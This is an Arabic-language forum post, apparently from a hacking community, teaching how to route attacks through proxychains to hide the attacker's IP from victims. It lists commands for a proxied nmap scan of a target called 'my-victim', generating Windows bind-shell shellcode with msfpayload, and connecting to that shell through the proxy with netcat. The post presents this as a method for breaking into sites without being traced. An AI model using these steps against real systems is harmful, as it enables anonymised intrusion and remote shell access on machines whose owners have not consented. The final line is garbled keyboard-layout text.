السلام عليكم ورحمه الله وبركاته
اليوم درسنا خفيف وسهل ,
لان ماشفت نقاش او احد تطرق الى proxychains
الكثير منا حاول يخترق مواقع لكن المشكله في IP المهاجم ,, ممكن ينصاد عن طريقه
على العموم اليوم راح نفحص بـ nmap ونستخدم ثغره عن طريق البروكسي
انتبه انتبه انتبه , عند اختيار البوركسي ,
لان ممكن يضيع عليك الثغرات, والثغرات اللي ممكن تشتغل مش مشتغله وكله بسبب البروكسي :-)
البروكسي المستخدم :
الاداه اللي راح نستخدمها هي proxychains
الاداه قويه واستخداماتها متنوعه ,, ببساطه هي عمل TCP tunneling عن طريق socks4/5 & http/s
فائدة الـ proxychains يجبر اي برنامج بأن يشتغل خلف بروكسي
لذلك انا راح استخدمها للاختراق والفحص :-)
الشرح فديو لكن بوضح بعض الاشياء ,
كود PHP:
كود:
nano /etc/proxychains.conf
انا وضعت البروكسي داخل الاعدادات
كود PHP:
كود:
proxychains nmap -PN -sT -sV -p 21,22,23,25,80 my-victim
انا اجبرت الـ nmap بأن يشتغل ورا بروكسي ويقوم فحص IP ضحيتي ممكن تستخدم ادوات اخرى مثل nikto لكن ما يحتاج انك تستخدم proxychains لان nikto له خاصيه العمل خلف بروكسي 
بعد الفحص وجدنا ان بورت 21,80 مفتوحه , وراح نلاحظ ان الـ nmap اعطاني الـ بنر للبورت 21 وقدرت اطلع ثغره موجوده ,,
كود PHP:
كود:
msfpayload windows/shell_bind_tcp lport=585 C
علمت شل كود , وراح يعطيني شل على البورت 585
كود PHP:
كود:
proxychains nc -vn my-victim 585
الان حصلت شل عن طريق البروكسي راح تتابعون في الفديو ان جميع الاتصالات في جهازي وجهاز ضحيتي عن طريق البروكسي *التطبيق صار على سيرفري الشخصي 
download proxychains مشاهده ممتعه :-)smilies15
SiLv3r00t
hsjo]hl hgfv,;sdhj lk hgtpw hgn hgpw,g ugn ag !